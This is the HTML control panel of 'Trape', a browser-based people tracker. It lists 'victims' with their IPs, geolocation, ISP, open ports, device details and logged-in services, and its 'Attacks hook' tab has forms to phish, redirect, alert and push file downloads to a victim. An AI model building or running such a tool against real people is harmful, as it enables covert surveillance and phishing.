<!doctype html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <title>Trape: Control Panel</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
    <meta http-equiv="X-UA-Compatible" content="IE=edge"/>

    <meta name="viewport" content="initial-scale=1.0,user-scalable=no,maximum-scale=1,width=device-width">
    <meta name="apple-mobile-web-app-title" content="Trape">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="theme-color" content="#3e396b" />
    <meta name="google" value="notranslate"/>
    <meta name="author" content="Boxug, @boxug"/>
    <meta name="description" content="Learn to track the world, to avoid being traced"/>

    <!-- Styles & Favicon -->
    <link rel="shortcut icon" type="image/x-icon" href="static/img/favicon.ico">
    <link rel="shortcut icon" type="image/png" href="static/img/favicon.png">
    <link rel="stylesheet" href="static/css/normalize.min.css">
    <link rel="stylesheet" href="static/css/base-icons.css">
    <link rel="stylesheet" href="static/css/services-icons.css">
    <link rel="stylesheet" href="static/css/styles.css">
    <!--[if (gte IE 6) & (lte IE 9)]>
      <script src="http://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7/html5shiv.min.js"></script>
      <script src="http://cdnjs.cloudflare.com/ajax/libs/respond.js/1.4.2/respond.js"></script>
    <![endif]-->
</head>

<body class="TrapeBody-Control">

  <div class="TrapeControl-Header">
      <div class="TrapeControl-Header--logo">
        <div class="TrapeControl-Header--logo---Box">
          <span class="TrapeControl-Header--logo---letter">t:</span>
        </div>
        <a href="/" class="TrapeControl-Header--logoText">trape <span class="TrapeControl-Header--logo---description">People tracker on the Internet</span></a>
      </div>

      <div class="TrapeControl-Header--menu">
        <a class="TrapeControl-Header--menu---btnLogout" href="/logout">
          <div class="TrapeControl-Header--menu---btnLogout----Icon icon-sign-out"></div>
          <div class="TrapeControl-Header--menu---btnLogout----Text">Logout</div>
        </a>
      </div>
  </div>

  <div class="TrapeControl-Wrapper">
      <div class="TrapeControl-Wrapper--PrincipalData">

        <div class="TrapeControl-Wrapper--PrincipalData---Info">
            <div class="TrapeControl-Wrapper--PrincipalData---InfoDetails">
              <h2><span class="TrapeControl-Wrapper--PrincipalData---InfoDetails----Icons icon-text-document"></span> <span id="lblTrape_DomainTitle"></span></h2>
              <span class="TrapeControl-Wrapper--PrincipalData---InfoDetails---domainClone"><span class="TrapeControl-Wrapper--PrincipalData---InfoDetails----Icons icon-globe"></span> Domain clone: <a target="_blank" href="#" id="lnkTrapeControl_DomainClone"></a></span>
              <span class="TrapeControl-Wrapper--PrincipalData---InfoDetails---start"><span class="TrapeControl-Wrapper--PrincipalData---InfoDetails----Icons icon-clock-o"></span> Starting on <span id="lblTrapeControl_StartDate">{start date}</span></span>

              <div class="TrapeControl-Wrapper--PrincipalData---InfoDetails----zoneCopy">
                <a class="TrapeControl-Wrapper--PrincipalData---InfoDetails----zoneCopy-----url" id="lnkTrapeControl_url" target='_blank' href="http://localhost">http://localhost</a> 
                <button class="TrapeControl-Wrapper--PrincipalData---InfoDetails----zoneCopy-----button" title="Copy" onclick="copyUrl('#lnkTrapeControl_url')"><span class="icon-clipboard2"></span></button>  
                <button class="TrapeControl-Wrapper--PrincipalData---InfoDetails----zoneCopy-----buttonShare" title="Sharing in networks" data-action="toggle"><span class="icon-share"></span></button>  
                <ul class="TrapeControl-shareBox">
                  <li class="TrapeControl-shareBox--Item---triangleDown"></li>
                  <li class="TrapeControl-shareBox--Item---list">
                    <a target="_self" id="lnkTrape_ShareTwitter" href="#"><span class="TrapeControl-shareBox--socialTwitter"><i class="icon-twitter"></i></span> Twitter <span class="TrapeControl-shareBox--pointRight"></span></a>
                  </li>
                  <li class="TrapeControl-shareBox--Item---list">
                    <a target="_self" id="lnkTrape_ShareFacebook" href="#"><span class="TrapeControl-shareBox--socialFacebook"><i class="icon-facebook"></i></span> Facebook <span class="TrapeControl-shareBox--pointRight"></span></a>
                  </li>
                </ul>
              </div>

          </div>
        </div>
        <!-- </info -->


    </div>

<div class="TrapeControl-ViewDetails">
    <div class="TrapeControl-Preview">
      <div class="TrapeControl-Preview--box">
        <div class="TrapeControl-Preview--buttonClose"><i class="icon-times"></i></div>
        <div class="TrapeControl-Preview--box---Sidebar">
          <div class="TrapeControl-Preview--box---Sidebar----title">
            <h2>Sessions connection</h2>
          </div>

          <div class="TrapeControl-Preview--box---Sidebar----Networks">
            <div class="TrapeControl-Preview--box---Sidebar----NetworksDefine facebook"><span class="TrapeControl-Preview--box---Sidebar----NetworksStatus online">Online</span></div>
            <div class="TrapeControl-Preview--box---Sidebar----NetworksDefine twitter"><span class="TrapeControl-Preview--box---Sidebar----NetworksStatus offline">Offline</span></div>
            <div class="TrapeControl-Preview--box---Sidebar----NetworksDefine vkontakte"><span class="TrapeControl-Preview--box---Sidebar----NetworksStatus offline">Offline</span></div>
            <div class="TrapeControl-Preview--box---Sidebar----NetworksDefine reddit"><span class="TrapeControl-Preview--box---Sidebar----NetworksStatus offline">Offline</span></div>
            <div class="TrapeControl-Preview--box---Sidebar----NetworksDefine google-plus"><span class="TrapeControl-Preview--box---Sidebar----NetworksStatus offline">Offline</span></div>
            <div class="TrapeControl-Preview--box---Sidebar----NetworksDefine tumblr"><span class="TrapeControl-Preview--box---Sidebar----NetworksStatus offline">Offline</span></div>
            <div class="TrapeControl-Preview--box---Sidebar----NetworksDefine instagram"><span class="TrapeControl-Preview--box---Sidebar----NetworksStatus offline">Offline</span></div>
            <div class="TrapeControl-Preview--box---Sidebar----NetworksDefine medium"><span class="TrapeControl-Preview--box---Sidebar----NetworksStatus offline">Offline</span></div>
            <div class="TrapeControl-Preview--box---Sidebar----NetworksDefine github"><span class="TrapeControl-Preview--box---Sidebar----NetworksStatus online">Online</span></div>
            <div class="TrapeControl-Preview--box---Sidebar----NetworksDefine bitbucket"><span class="TrapeControl-Preview--box---Sidebar----NetworksStatus online">Online</span></div>
            <div class="TrapeControl-Preview--box---Sidebar----NetworksDefine dropbox"><span class="TrapeControl-Preview--box---Sidebar----NetworksStatus online">Online</span></div>
            <div class="TrapeControl-Preview--box---Sidebar----NetworksDefine spotify"><span class="TrapeControl-Preview--box---Sidebar----NetworksStatus online">Online</span></div>
            <div class="TrapeControl-Preview--box---Sidebar----NetworksDefine paypal"><span class="TrapeControl-Preview--box---Sidebar----NetworksStatus offline">Offline</span></div>
            <div class="TrapeControl-Preview--box---Sidebar----NetworksDefine amazon"><span class="TrapeControl-Preview--box---Sidebar----NetworksStatus offline">Offline</span></div>
            <div class="TrapeControl-Preview--box---Sidebar----NetworksDefine foursquare"><span class="TrapeControl-Preview--box---Sidebar----NetworksStatus offline">Offline</span></div>
            <div class="TrapeControl-Preview--box---Sidebar----NetworksDefine airbnb"><span class="TrapeControl-Preview--box---Sidebar----NetworksStatus offline">Offline</span></div>
            <div class="TrapeControl-Preview--box---Sidebar----NetworksDefine hackernews"><span class="TrapeControl-Preview--box---Sidebar----NetworksStatus offline">Offline</span></div>
            <div class="TrapeControl-Preview--box---Sidebar----NetworksDefine slack"><span class="TrapeControl-Preview--box---Sidebar----NetworksStatus offline">Offline</span></div>
            <div class="TrapeControl-Preview--box---Sidebar----NetworksBehavior"><i class="icon-user2"></i> behavior: <span id="lblTrapeControl_Preview_Behavior"></span></div>
          </div>
        </div>

        <div class="TrapeControl-Preview--box---Mapbox">
          <div class="TrapeControl-Preview--box---MapboxDataIPs">
              <span class="TrapeControl-Preview--box---MapboxDataIPs----iconBox">
                  <span class="icon-server"></span>
              </span>
              <span class="TrapeControl-Preview--box---MapboxDataIPs----text">Public IP: <a class="TrapeControl-Preview--box---MapboxDataIPs----link" href="#" id="lnkTrapeControlPreview_PublicIP"></a></span>
              <div class="TrapeControl-Preview--box---MapboxDataIPs----line"></div>
              <span class="TrapeControl-Preview--box---MapboxDataIPs----text">Local IP: <span class="TrapeControl-Preview--box---MapboxDataIPs----textLocal" id="lnkTrapeControlPreview_LocalIP"></span></span>
            </div>
          <a id="lnkTrapeControlPreview_Map" target="_blank" href="#"><img  id="imgTrapeControlPreview_Map" class="TrapeControl-Preview--box---Mapbox----define" src="#"></a>
        </div>
      </div>

      <div class="TrapeControl-Preview--box">

        <div class="TrapeControl-Preview--box---Details">
          <div class="TrapeControl-Preview--box---DetailsLine">
            <span class="TrapeControl-Preview--box---DetailsLine----define"></span>
            <div class="TrapeControl-Preview--box---DetailsElement----Iconbox">
              <span class="TrapeControl-Preview--box---DetailsElement----Iconbox-----define">
                  <span class="icon-sitemap"></span>
              </span>
              <span class="TrapeControl-Preview--box---DetailsElement----text">General</span>
            </div>
             <!-- tabs -->
            <div class="TrapeControl-Preview--Tabs">
              <button data-action="information" class="TrapeControl-Preview--Tabs---button is-active" >Information</button>
                <button data-action="attacksHook" class="TrapeControl-Preview--Tabs---button">Attacks hook</button>
            </div>

          </div>
        </div>


        <div class="TrapeControl-BoxTab" data-action="information">
          <div class="TrapeControl-Preview--dataShow">
            <ul>
              <div class="TrapeControl-Preview--dataShow---define"><strong>CPU:</strong> <span id="lblTrapeControl_Preview_CPU">_</span></div>
              <div class="TrapeControl-Preview--dataShow---define"><strong>Operating System:</strong> <span id="lblTrapeControl_Preview_SO"></span></div>
              <div class="TrapeControl-Preview--dataShow---define" title=""><strong>User agent:</strong> <span id="lblTrapeControl_Preview_UA">_</span></div>
              <div class="TrapeControl-Preview--dataShow---define"><strong>Browser:</strong> <span id="lblTrapeControl_Preview_Browser"></span> <span id="lblTrapeControl_Preview_BrowserVersion"></span></div>
              <div class="TrapeControl-Preview--dataShow---define"><strong>Open Ports:</strong> <span id="lblTrapeControl_Preview_OpenPorts">_</span></div>
            </ul>
          </div>

          <div class="TrapeControl-Preview--dataShow">
            <ul>
              <div class="TrapeControl-Preview--dataShow---define"><strong>ISP Name:</strong> <span id="lblTrapeControl_Preview_ISP">_</span></div>
              <div class="TrapeControl-Preview--dataShow---define"><strong>Country:</strong> <span id="lblTrapeControl_Preview_Country"></span></div>
              <div class="TrapeControl-Preview--dataShow---define"><strong>City:</strong> <span id="lblTrapeControl_Preview_City"></span></div>
              <div class="TrapeControl-Preview--dataShow---define"><strong>Latitude:</strong> <span id="lblTrapeControl_Preview_Latitude"></span></div>
              <div class="TrapeControl-Preview--dataShow---define"><strong>Longitude:</strong> <span id="lblTrapeControl_Preview_Longitude"></span></div>
            </ul>
          </div>
        </div>
      </div>
      <div class="TrapeControl-BoxTab" data-action="attacksHook">
        <h2 class="TrapeControl-BoxTab--description">Here performs some controls in the browser of the victim</h2>
        <div class="TrapeControl-Preview--dataShow">
          <form class="TrapeControl-BoxTab--Form" action="?" method="post">
            <input type="url" id="txtTrapeControl-BoxTab-Phishing" autocomplete="on" class="TrapeControl-BoxTab--Form---input" placeholder="Insert domain for phishing" name="phishing" required="true">
            <button id="btnTrapeControl-BoxTab-Phishing" class="TrapeControl-BoxTab--Form---button" type="button">attack <span class="icon-angle-right"></span></button>
          </form>

          <form class="TrapeControl-BoxTab--Form" action="?" method="post">
            <input type="url" id="txtTrapeControl-BoxTab-Redirect" autocomplete="on" class="TrapeControl-BoxTab--Form---input" placeholder="Insert link to redirect" name="redirect" required="true">
            <button id="btnTrapeControl-BoxTab-Redirect" class="TrapeControl-BoxTab--Form---button" type="button">redirect <span class="icon-angle-right"></span></button>
          </form>
        </div>

        <div class="TrapeControl-Preview--dataShow">
          <form class="TrapeControl-BoxTab--FormRight" action="?" method="post">
            <input id="txtTrapeControl-BoxTab-Alert" type="text" autocomplete="on" class="TrapeControl-BoxTab--Form---input" placeholder="Create alert for victim" name="alert" required="true">
            <button id="btnTrapeControl-BoxTab-Alert" class="TrapeControl-BoxTab--Form---button" type="button">execute <span class="icon-angle-right"></span></button>
          </form>

          <form class="TrapeControl-BoxTab--FormRight" action="?" method="post">
            <input id="txtTrapeControl-BoxTab-Execute" type="text" autocomplete="on" class="TrapeControl-BoxTab--Form---input" placeholder="Enter a file to download" name="download" required="true">
            <button id="btnTrapeControl-BoxTab-Execute" class="TrapeControl-BoxTab--Form---button" type="button">Send <span class="icon-angle-right"></span></button>
          </form>
        </div>
      </div>
    </div> <!-- end(box) -->
  </div> <!-- end/modal -->
    <!-- end details -->


    <div class="TrapeControl-Wrapper--Stats">
      <div class="TrapeControl-Wrapper--Stats---Item">
        <h2 class="TrapeControl-Wrapper--Stats---Item----text">Online</h2>
        <span class="TrapeControl-Wrapper--Stats---Item----number" id="lblTrapeControl_Stats_Online">0</span>
      </div>
      <div class="TrapeControl-Wrapper--Stats---lineSeparation"></div>
      <div class="TrapeControl-Wrapper--Stats---Item">
        <h2 class="TrapeControl-Wrapper--Stats---Item----text">victims</h2>
        <span class="TrapeControl-Wrapper--Stats---Item----number" id="lblTrapeControl_Stats_Victims">0</span>
      </div>
      
      <div class="TrapeControl-Wrapper--Stats---lineSeparation"></div>
      <div class="TrapeControl-Wrapper--Stats---Item">
        <h2 class="TrapeControl-Wrapper--Stats---Item----text">clicks</h2>
        <span class="TrapeControl-Wrapper--Stats---Item----number" id="lblTrapeControl_Stats_Clicks">0</span>
      </div>
      <div class="TrapeControl-Wrapper--Stats---lineSeparation"></div>
      <div class="TrapeControl-Wrapper--Stats---Item">
        <h2 class="TrapeControl-Wrapper--Stats---Item----text">sessions</h2>
        <span class="TrapeControl-Wrapper--Stats---Item----number" id="lblTrapeControl_Stats_Sessions">0</span>
      </div>
      <div class="TrapeControl-Wrapper--Stats---lineSeparation"></div>
      <div class="TrapeControl-Wrapper--Stats---Item">
        <h2 class="TrapeControl-Wrapper--Stats---Item----text">requests</h2>
        <span class="TrapeControl-Wrapper--Stats---Item----number" id="lblTrapeControl_Stats_Requests">0</span>
      </div>
      <div class="TrapeControl-Wrapper--Stats---lineSeparation"></div>
      <div class="TrapeControl-Wrapper--Stats---Item">
        <h2 class="TrapeControl-Wrapper--Stats---Item----text">Locations</h2>
        <span class="TrapeControl-Wrapper--Stats---Item----number" id="lblTrapeControl_Stats_Locations"></span>
      </div>
    </div>

    <!-- list requests & history -->
    <div class="TrapeControl-History">
      <div class="TrapeControl-History--Tabs">
        <button data-action="logs" class="TrapeControl-History--Tabs---button is-active"><span class="TrapeControl-History--Tabs---button----iconLogs"></span>Logs Victims</button>
        <button data-action="requests" class="TrapeControl-History--Tabs---button"><span class="TrapeControl-History--Tabs---button----iconRequests"></span>Request History</button>
      </div>

      <div class="TrapeControl-History--line"></div>

      <div id="cntTrapeControl_Logs" class="TrapeControl-History--Logs" data-action="logs">

      </div> 
      <!-- </.Logs -->

      <!-- requests -->
      <div id="cntTrapeControl_Requests" class="TrapeControl-History--Logs" data-action="requests">
                 
      </div>
               <!-- end(requests)-->

      <div class="TrapeControl-Copyright">
        <span class="TrapeControl-Copyright--iconCode"></span> with <span class="TrapeControl-Copyright--iconLove"></span> by <a class="TrapeControl-Copyright--link" href="https://boxug.com" title="Boxug: First Your Security"><img class="TrapeControl-Copyright--logo" width="90" src="static/img/boxug-logo.svg" alt="boxug"></a>
      </div>
    </div><!-- </.Re -->
    <!-- fin list -->

  </div>
</div>
<!-- log -->

<script src="static/js/libs.min.js"></script>
<script src="static/js/trape.js"></script>
<script type="text/javascript">
function copyUrl(id) {
        var $temp = $("<input>");
        $("body").append($temp);
        $temp.val($(id).text()).select();
        document.execCommand("copy");
        $temp.remove();
    }
</script>
</body>
</html>